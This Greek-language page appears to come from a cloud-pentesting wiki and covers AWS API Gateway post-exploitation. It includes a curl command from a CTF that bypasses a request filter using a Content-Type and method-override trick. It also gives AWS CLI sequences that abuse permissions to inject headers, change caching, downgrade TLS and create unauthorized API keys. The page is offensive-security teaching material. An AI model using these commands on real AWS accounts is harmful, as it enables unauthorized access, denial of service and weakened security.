AWS - API Gateway Post Exploitation

API Gateway

Για περισσότερες πληροφορίες ελέγξτε:

Πρόσβαση σε μη εκτεθειμένα APIs

Μπορείτε να δημιουργήσετε ένα endpoint στο https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint με την υπηρεσία com.amazonaws.us-east-1.execute-api, να εκθέσετε το endpoint σε ένα δίκτυο όπου έχετε πρόσβαση (πιθανώς μέσω μιας μηχανής EC2) και να αναθέσετε μια ομάδα ασφαλείας που επιτρέπει όλες τις συνδέσεις. Στη συνέχεια, από τη μηχανή EC2 θα μπορείτε να αποκτήσετε πρόσβαση στο endpoint και επομένως να καλέσετε το gateway API που δεν είχε εκτεθεί προηγουμένως.

Παράκαμψη Request body passthrough

Αυτή η τεχνική βρέθηκε σε αυτή την αναφορά CTF.

Όπως αναφέρεται στην τεκμηρίωση AWS στην ενότητα PassthroughBehavior, από προεπιλογή, η τιμή WHEN_NO_MATCH, κατά τον έλεγχο της κεφαλίδας Content-Type του αιτήματος, θα περάσει το αίτημα στο backend χωρίς μετασχηματισμό.

Επομένως, στο CTF το API Gateway είχε ένα πρότυπο ολοκλήρωσης που εμπόδιζε τη σημαία να εξαχθεί σε μια απάντηση όταν αποστέλλεται ένα αίτημα με Content-Type: application/json:

RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'

Ωστόσο, η αποστολή ενός αιτήματος με Content-type: text/json θα εμπόδιζε αυτό το φίλτρο.

Τέλος, καθώς το API Gateway επέτρεπε μόνο Get και Options, ήταν δυνατό να σταλεί ένα αυθαίρετο ερώτημα dynamoDB χωρίς κανέναν περιορισμό στέλνοντας ένα POST αίτημα με το ερώτημα στο σώμα και χρησιμοποιώντας την κεφαλίδα X-HTTP-Method-Override: GET:

curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'

Usage Plans DoS

Στην ενότητα Enumeration μπορείτε να δείτε πώς να αποκτήσετε το σχέδιο χρήσης των κλειδιών. Εάν έχετε το κλειδί και είναι περιορισμένο σε X χρήσεις ανά μήνα, μπορείτε απλώς να το χρησιμοποιήσετε και να προκαλέσετε DoS.

Το API Key πρέπει απλώς να συμπεριληφθεί μέσα σε ένα HTTP header που ονομάζεται x-api-key.

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

Ένας επιτιθέμενος με τις άδειες apigateway:UpdateGatewayResponse και apigateway:CreateDeployment μπορεί να τροποποιήσει μια υπάρχουσα Gateway Response για να συμπεριλάβει προσαρμοσμένα headers ή πρότυπα απάντησης που διαρρέουν ευαίσθητες πληροφορίες ή εκτελούν κακόβουλα σενάρια.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Πιθανές Επιπτώσεις: Διαρροή ευαίσθητων πληροφοριών, εκτέλεση κακόβουλων σεναρίων ή μη εξουσιοδοτημένη πρόσβαση σε πόρους API.

apigateway:UpdateStage, apigateway:CreateDeployment

Ένας επιτιθέμενος με τις άδειες apigateway:UpdateStage και apigateway:CreateDeployment μπορεί να τροποποιήσει μια υπάρχουσα σκηνή API Gateway για να ανακατευθύνει την κίνηση σε μια διαφορετική σκηνή ή να αλλάξει τις ρυθμίσεις caching για να αποκτήσει μη εξουσιοδοτημένη πρόσβαση σε αποθηκευμένα δεδομένα.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη πρόσβαση σε αποθηκευμένα δεδομένα, διακοπή ή παρεμβολή στην κυκλοφορία API.

apigateway:PutMethodResponse, apigateway:CreateDeployment

Ένας επιτιθέμενος με τις άδειες apigateway:PutMethodResponse και apigateway:CreateDeployment μπορεί να τροποποιήσει την απάντηση μεθόδου μιας υπάρχουσας μεθόδου API Gateway REST API για να συμπεριλάβει προσαρμοσμένα headers ή πρότυπα απάντησης που διαρρέουν ευαίσθητες πληροφορίες ή εκτελούν κακόβουλα σενάρια.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Πιθανές Επιπτώσεις: Διαρροή ευαίσθητων πληροφοριών, εκτέλεση κακόβουλων σεναρίων ή μη εξουσιοδοτημένη πρόσβαση σε πόρους API.

apigateway:UpdateRestApi, apigateway:CreateDeployment

Ένας επιτιθέμενος με τις άδειες apigateway:UpdateRestApi και apigateway:CreateDeployment μπορεί να τροποποιήσει τις ρυθμίσεις του API Gateway REST API για να απενεργοποιήσει την καταγραφή ή να αλλάξει την ελάχιστη έκδοση TLS, ενδεχομένως αποδυναμώνοντας την ασφάλεια του API.

API_ID="your-api-id"

# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Πιθανές Επιπτώσεις: Αδυναμία της ασφάλειας του API, επιτρέποντας ενδεχομένως μη εξουσιοδοτημένη πρόσβαση ή έκθεση ευαίσθητων πληροφοριών.

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

Ένας επιτιθέμενος με δικαιώματα apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, και apigateway:CreateUsagePlanKey μπορεί να δημιουργήσει νέα API keys, να τα συσχετίσει με σχέδια χρήσης και στη συνέχεια να χρησιμοποιήσει αυτά τα κλειδιά για μη εξουσιοδοτημένη πρόσβαση σε APIs.

# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')

# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη πρόσβαση σε πόρους API, παράκαμψη ελέγχων ασφαλείας.